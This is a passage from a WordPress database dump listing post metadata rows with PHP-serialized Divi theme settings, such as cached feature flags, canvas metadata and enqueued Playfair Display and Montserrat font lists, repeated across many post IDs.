:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33158,534,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33159,528,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33160,528,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33153,571,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33154,571,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33155,534,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33156,534,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33150,646,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33151,571,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33152,571,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33146,594,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33147,646,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33148,646,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33149,646,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33142,820,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33143,594,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33144,594,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33145,594,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33136,678,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33137,678,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33138,678,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33139,820,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33140,820,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33141,820,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33133,1178,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33134,1178,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33135,678,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33131,1178,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33132,1178,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33128,1153,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33129,1153,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33130,1153,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33119,776,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33120,776,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33121,776,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33122,776,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33123,1587,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33124,1587,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33125,1587,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33126,1587,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33127,1153,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33115,1018,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33116,1018,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33117,1018,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33118,1018,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33112,1513,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33113,1513,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33114,1513,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33108,1134,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33109,1134,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33110,1134,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33111,1513,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33106,1155,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33107,1134,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33102,1646,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\"